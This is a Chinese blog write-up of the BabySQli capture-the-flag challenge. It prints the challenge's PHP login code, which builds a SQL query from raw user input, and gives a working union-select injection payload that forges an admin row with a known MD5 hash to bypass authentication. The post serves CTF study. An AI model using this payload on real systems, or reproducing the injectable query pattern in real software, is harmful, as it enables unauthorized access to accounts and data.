[GXYCTF2019]BabySQli 1(详解)

已于 2023-10-16 14:54:49 修改
阅读量152 收藏
点赞数 1
文章标签: 网络安全
于 2023-10-16 14:47:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A86445/article/details/133856768
版权

直接上题分析

确诊为单引号闭合

有报错回显

无回显,爆出字段为3,暂时猜测为 id,username,password

经过一系列测试下来发现过滤了,括号,or ,|,=

到这里有点束手无策,上网看了一下大6们的解题思路豁然开朗,以下是大佬提供的源代码

<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";

// 去除转义
if (get_magic_quotes_gpc()) {
	function stripslashes_deep($value)
	{
		$value = is_array($value) ?
		array_map('stripslashes_deep', $value) :
		stripslashes($value);
		return $value;
	}

	$_POST = array_map('stripslashes_deep', $_POST);
	$_GET = array_map('stripslashes_deep', $_GET);
	$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
	$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '<pre>';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

?>

发现有一处逻辑漏洞在如下

可以看出php未对返回数据进行安全的处理,当我们对联合查询数据时未指明表名,select时数据库会返回一个虚拟的表与当前表拼接返回给php,实列如下:

也就是说如果我们如果进行以下payload:

​
1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'#&pw=123456

e10adc3949ba59abbe56e057f20f883e为md5加密后的密码,原因是在开发过程中为了更好的保护密码。

A86445
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
VS2019属性配置详解
10-14
Visual Studio 2019(VS2019)是微软开发的一款强大的集成开发环境,其属性配置是项目构建和调试过程中的关键环节。本文将深入探讨如何在VS2019中进行属性配置,以便更好地管理和优化你的项目。 首先,我们来看如何...
TCP-IP详解卷1
01-22
TCP-IP详解卷1,压缩文件中是pdf的文档,欢迎一起学习一起分享
[GXYCTF2019]BabySQli 1
qq_43618536的博客
07-03 1149
BUUCTF的[GXYCTF2019]BabySQli 1
[GXYCTF2019]BabySQli1-BUUCTF
最新发布
chinese_cabbage0的博客
02-05 794
主要是一个buuctf题目的解题过程,大家可以参考一下
tcpip详解 卷1-卷3
05-20
tcpip详解 卷1-卷3
openCV4.1.1+VS2019环境配置详解
08-18
主要介绍了openCV4.1.1+VS2019环境配置详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
tcp ip详解 卷1 协议 pdf
01-04
tcp ip详解 卷1 协议 pdf 有书签 清晰 非扫描
[GXYCTF2019]BabySQli1
m0_62706061的博客
10-17 1220
ctf
BUU实战笔记——[GXYCTF2019]BabySQli1
qq_51175992的博客
09-16 213
这题是很简单的SQL注入,考察的是基本功和对联合查询的理解这里有两点需要特别注意:1. 不管是CTF题目还是实际的挖洞一定要先把它的流程走一遍看它是怎么玩的,再考虑怎么攻击,前期的信息收集十分重要!2.数据库的密码一般是通过MD5加密处理的,在注入的时候需要特别注意。
[GXYCTF2019]BabySQli[CISCN2019 华北赛区 Day2 Web1]Hack World;[GYCTF2020]Blacklist;[网鼎杯 2018]Fakebook
feiniaotjx的博客
11-21 148
[GXYCTF2019]BabySQli[GXYCTF2019]BabySQli [GXYCTF2019]BabySQli 这段代码最为重要,只有usernamed的参数带入了sql语句,查询到结果后判断arr[1]是否为admin,arr[2]是否与md5加密后的密码相同 mysqli_query($con,'SET NAMES UTF8'); $name = $_POST['name']; $password = $_POST['pw']; $t_pw = md5($password); $sql =
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2668
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
abaqus 2019基础教程于详解 pdf
09-17
"Abaqus 2019基础教程于详解"是一本介绍Abaqus软件的基础教程的PDF文件。Abaqus是一款被广泛应用于工程仿真领域的有限元分析软件,它可以帮助工程师和研究人员进行结构分析、热分析、流体力学分析等多种工程仿真。该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值